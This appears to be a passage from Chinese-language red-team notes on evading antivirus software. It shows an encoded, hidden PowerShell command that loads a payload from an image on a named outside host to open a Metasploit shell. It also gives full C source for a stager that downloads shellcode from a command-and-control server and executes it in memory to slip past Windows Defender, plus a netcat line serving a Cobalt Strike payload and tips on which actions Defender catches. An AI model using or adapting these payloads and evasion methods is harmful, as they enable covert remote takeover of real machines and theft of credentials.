        [+] Successfully save the image. (/root/DKMC/output/output-1599057844.bmp)

图片生成了,拷出来放到vps上面,然后exit回退

地址: http://www.lucifer11.xyz/evil11.bmp

1
2
3
4
5
6
7
8
ps

(powershell)>>> set url http://www.lucifer11.xyz/evil11.bmp
        [+] url value is set.

(powershell)>>> run
        [+] Powershell script:
powershell.exe -nop -w hidden -enc JABmAG0AcAB5AEYAUQBlAG4AegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBIADQAcwBJAEMARwBlAHoAVAAxADgAQwAvAHoARQAxAE8AVABrAHcATgBUAGcAMwBPAFQARQB1AE4ARABRACEAdABWAFoAdABUACsATQA0AEUAUAA2AE8AeABIACsAdwBWAHAARwBTAFMARwBrAG8AeQAzADAANABJAGEAMQBFAEsAYgBDAFUAbwA5ADEAZQB5ADgATAB1AGQAcQB1AFYAawAwAHgAYgBMADQANABkAGIASwBjAGwAdQAvAEQAZgBiADUAdwBYAFcAZwBUAGMAYwBuAGUANgBmAEkAbABmAFoAdQB5AFoANQB4AGsALwB0AHYAUABIAHMAcwBQAEkATwAzAEwAZwBiAG0ALwBOAGMAaABFAGIASgBnAFUAcABWAEoAYgBEAE4AZgBtADUAdgBVAFgAcQBiADAAZwBWAFQAWQBuAG4ATABLAG4ANgBsAHMAbwBrADUAeABDAFEAcwBwAE0AcABHAFUATwBTAEsALwBEAFgAeABrADUAeQBmAG4AWQB1AHgAUABJAFEAMQAvAFUAbQBuAFMAdwA3AGsAaQBsAGwAWQByAHEALwAzADgAMgBWACEAbQBHAHEAZgB2AGcAZQBUAEUAZAByAFMAQwBQAE8AUQBIAHMAKwB1AFMATgBYAEMAMQBEAFEAKwBoAEIAOQBoADkAaQBRAG4AOABUADUARgByADcAbgBNAHEASwA4AE4AaQB1ADYATgBGADQAIQBhAFgAVgBFAFkAdQBmAE8AWgBVAHgAdAB2AE8ARQA0ADQAOAB4ADQANwB0AGUAdgByAGoAOQBwADcAVQA3AEQANAA1AHUAYwBjAHUAMgA1ADQAMABJAGIAUwBNAE8ARQBjADkAYwBuADkANwA3AGQAOABLAEwASQB3AEgAUAA3AEwARgBaAFMAeQA1AGsASgByADUAagBZAGUAeAB0ACsARgBKAHIATwBZAEkAQwByAEwAYQBFAFAAWgBpAEUAVAA3AFcASgBDADYANQBRAFUAbQBGAHkASgBkAFcAWgAyAHEAYwByAFEAYwA3AEUANQBSAEIAUQA2AFMAYQBKACEAbwAxAC8AWQBFADAAdAA1AEQAWgA0AGoAYwBzADQARABjAHUAQgBOADYAagBoAEcAdQBUACEAcwBCAFoAdwAzAG8ARwBRADIAQgByAFYAawBNAGUAagB3AGwASQBxAEUAdwB3AGgAbQBVADIAOAAhAHEAeQBiADkAMQB6AHAANQBtADAANQBvAE4AVABUAEsARAA1AEMAcQBGADAATAB0AGwAKwB4AFYAMwBxADcALwBOAE4AZwBOAGkAbgAzADgAbgB0AEMATQBzAE4AeABiAFoAQgA2AEsANQBYAE4AKwBkAFQAWgA3AHAAbABiAFcAIQA4ADAAMwBLAFcAYwAhADgALwBDAEcAVQByAFAAUwArAHgAMQBwAEIANgBTAFAAMABWACEAagBWAFkARgBkADUAMABMAGwANABFAC8ASgB4AEQASQAxAG0AVQA2AEoAdwAwACsASwA2AHoAKwBqADYARQB2AHcAMgBoAFYAMwBHADMAZAAwAGoAdQAhAHoAWABNAGgATQA0AGYARABrAFUAcgBKAGsAdQBsADcAawBFAGMASABPAFkAYgBHAHkATgBpADkAWAA2AHgASABNAG0ASQBDAGoAUQB0AEMAVQB4AFUAMQBCAGUAcwA4AHgAQgBqAE0ATwBKAFQAWgBoAFkAegBiACEASQBEADIAMwBuAG8ARABrAEMARABqAE0AcQBiAEgANABCADIAVAB5ADEATwAwADQAWgBlAGIAQgA5AHoAQgBuAFAAIQBIAFYAaQBaAEYAMQBqAFYARgBoAFEAZgBpAFAAZwA2AGsAbwA5AGQAeQBlADYARQBPAEsASwBGAFoAOQBGADYAbQBiADQAVABHACEAeAByAG8AdQAvAGEATABaADMAZgBiAFIAeQBPADEAeQBxAG4AVgAhAGgAagBtAGUAdwB6AGcAZwBZADYAIQBjAGsAbwBCADAAaABHAGIAMQBWAEMAYwAzAHMAbQB5ADYANgAzAEQANwBPAFQAYwBzAHAAdABvADAAeQAwADMAOQB4ADIAagBXAHUAMwBhAGwAMABFAGIAbABNAGQASwBMAEMARgB5AE0ATQA0AGcAWgA1AFIAYQBRAGcASgB5AHkAQgAhADYATABNAFoAcwAzAHUANwB2AFAAdwB0AEcAbABuAEQATQB4AHgANQBXAFcAUwAhAGUATwBXAEIAagBHAHgAaABhAE4AdwBrACEAZgBDAHMAUQBQAHgAMgBCADYAYQBjAFkAaABSAGIAdABTAEcAawA0ADQAbgBhAE0AUQAxAEkAZQBvAHIARABRADYAaAA4AFIAOQBQAHQAYgBtAG0ARgBSAG4AdwBtAEwAVABnAEwASQBSAEsAUgBJACsANQB0AEkARQA1AEoASQBwAGcAegBwAGoAYwBXADYAcQA3AEQAOABIADAAKwBpAE0AagBhAG0AcgBvAEcAYgBKAHEAdwA1AGQAIQA4ADAAIQBVAEwAYwBnAEcAcwBGAE4ARAB0AG8AZwBGAGgAZwA5AFIAVABwAHcARABJAFgAbwB0AHIAQwBlAGkAVQBVAEsAMgBiAGMAMQB2AGUARwAyAG4AaQBtAGwAZABPADIANwA0AFkASQBiAEgAUgBiAEcAbgBqADIAbgAwAE4ARwB5AGwAeAA1AGYAVwBpAEYALwBXAHUAaAAxAEgARgAyAFUAYgAyAEcAdwB5AHUAUgBLAGMARQBtAFQASQAyAHEAbwA5ADIAWgBoAFQATABhAC8AcwA3AE4AYQByAFUASwBlAHgAMgB3AEcAYQBuAGMAMwB2AEMAMQArADcATQBDAFMAYwBXAHgARwBhAGYAYQBtAFAASQBIAE8ANABHAFIAMABNAFYASQBiAGcAYgA0AGsAZQBYADIAcQA5AEkASgB5AEQAQgBwADEAcgBDAG0ANwBFADYAbABPAGEAaQBrAGEAUwBtAFkAOQBQAEsAKwArAHYANgA1AEIAQwBlACEAbwA3ADMAZwBCAE4ARwB4ADEATwBKAGUAeAAxAGMAZABLAHQAbABDAGMASwA4AG0AYwBZAHUAVgA5AHgATwBiAGUAMgAyAGQAYgBQAG4AawB3ADkATgBlAGkAMgBRAHoAdAA3ADMALwBCAFEASgBIADgAQgBxAC8AdwBIAE0AVABjAEwASQBMADIANwBWADYANwBqAFEATABYAHYAdgAyAHQANwBhADgASgAvAEgAVwBDAFgAWgBrAFYAMwBzAE4AeQBnAFIAWABKAEcAcQBmAE4AWABYAGkANQBTADQAVwBpAFkAUgBIADgAMwB4AGoAVwBGAGIAbgAhAFgALwBKAEwARABOAGQAagBmAHoAUAA3AEsAbAB6AGIAUQBaAFAANwBrADQAbgBIACEALwA4AEkANABuACsAUgAvAHgAVgBsAEIAbQAzAEgASwBFAFkAYwBxAHIAUAB3ACEAZwB4ADEAMQBXAHoAYwByADUAWQBmAHIASQBkAFoALwBkAG4AWAB6AG8AZgBjAHQAIQBaADQANwBXADUAdgB1AFEAZQBXAHcAOQA2AE0AYgBLAFMAdQAyAFEAOQA4ADYAcwAhAE4AKwBkADMAZgB2AEYAMgAxAG8AYwBxADAAdgBzAHMASQAzADAAZQBaAHYAZgAwADgANQAvAFQAVAA4AHMAWQBjAG4ALwBtAGsAZAAvAHkASgBOAEQAMQB5AFQAMQBvAEkAUQBrAGYAdgB2AGMAVQBIAGsANQByAG4AVgBvAGEASQBVAHoANwAzADcAcwBnAEsATQB5AGsAWAB1AFMATQBqAGkAIQBHAGYAUABhADAAegBHAFoAVQBxACEAMwBoAGwAYgBHADUAWQBMAG0AcgBkAHkAdABtAC8AIQBIAGcAIQBoAHAAMAB3AEMAZwAhACEAIgAuAFIAZQBwAGwAYQBjAGUAKAAiACEAIgAsACAAIgBBACIAKQApACkAOwAgACQAdQBSAEQAcQBVAG8AIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAZgBtAHAAeQBGAFEAZQBuAHoALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwAgAFsAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAF0AOgA6AEMAcgBlAGEAdABlACgAJAB1AFIARABxAFUAbwApAC4ASQBuAHYAbwBrAGUAKAApAAoA

然后msf设置监听,并在victim上执行powershell脚本

运行脚本时被火绒拦截,但是bmp文件能过大多数杀软

shell无法弹到外网msf?只能在内网中使用?

Python-Rootkit

  • Python-Rootkit

需要特定msf版本,和32位的python和py2exe,比较麻烦

Beacon-绕过windows defender

编写一个简单的stager,这个stager仅用于申请内存、下载payload并执行,该stager本身并不包含恶意代码,因此可以绕过windows defender的静态扫描。

1、编写stager

首先编写stager用于远程下载payload并执行,这个stager是一个TCP客户端,从我们的C2服务器下载payload、申请内存、执行payload。代码如下(Visual Studio 2010静态编译):
静态编译设置:

(1).项目 -> 配置属性->常规->MFC的使用 :在静态库中使用MFC。
(2).项目 -> 配置属性->C/C++->代码生成->运行库 :选择/MT。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
#include "stdafx.h"
#include <WinSock2.h>
#include <WS2tcpip.h>
#include <iostream>
#include <Windows.h>
#include <stdlib.h>

#pragma comment(lib, "ws2_32.lib")
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )


int main(int argc, char *argv[])
{    
	// Declare and initialize variables
	WSADATA wsaData;
	WSAStartup(MAKEWORD(2, 2), &wsaData);
   

	if (argc != 3) {
        fprintf(stderr,"usage: stager.exe hostname port\n");
        exit(0);
    }
	struct hostent *host;
    if ((host=gethostbyname(argv[1])) == NULL) {  /* get the host info */			
        puts("Get IP address error!");     
        exit(0);
    }
	
	int port = 0;
	if ((port = atoi(argv[2])) == NULL) {  /* get the port info */
        puts("Get port error!");     
        exit(0);
    }

    SOCKET sclient = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sclient == INVALID_SOCKET)
    {
        printf("invalid socket !");
        return 0;
    }

    sockaddr_in serAddr;
    serAddr.sin_family = AF_INET;
    serAddr.sin_port = htons(port);
	serAddr.sin_addr = *((struct in_addr *)host->h_addr);
	
    if (connect(sclient, (sockaddr *)&serAddr, sizeof(serAddr)) == SOCKET_ERROR)
    {
        printf("connect error !");
        closesocket(sclient);
        return 0;
    }  
    char recData[1024];
    int receivedBytes = recv(sclient, recData, sizeof(recData), 0);
	printf("received:%d\n",receivedBytes);
    if(receivedBytes > 0)
    {      
		LPVOID shellcode = VirtualAlloc(NULL, receivedBytes, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);	
		printf("Allocated memory for shellocode at:%p\n",shellcode);
	
		memcpy(shellcode, recData, sizeof(recData));	
		printf("Copied shellcode to:%p,Sending back meterpreter session...\n",shellcode);
		((void(*)()) shellcode)();
    }
    closesocket(sclient);
    WSACleanup();	
    return 0;
}

stager生成之后,上传至目标机器并执行,执行方式如:stager.exe c2_hostname port

1
2
stager.exe www.xxxxxx.com 53    //使用域名方式
stager.exe 8.8.x.x 8080         //使用IP方式

(2)、生成CS payload并在C2服务器启动TCP Server
使用CS生成payload

在C2服务器上开启TCP Server,为了方便起见,直接使用netcat

1
echo -e "\xfc\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\xxx\x00\x00\x00\x00\x00" | nc -l -p 53 -vvv

(3)、目标上线
stager在目标机器上执行后,stager将在C2服务器下载payload并执行,目标上线。注意,虽然绕过了windows defender的静态扫描,但仍然需要小心defender的行为检测,比如利用beacon session进行提权、调用mimikatz时都会被defender检测到,不过dump hashes、proxy server等功能是可以正常执行的。

virustotal在线木马检测

https://www.virustotal.com/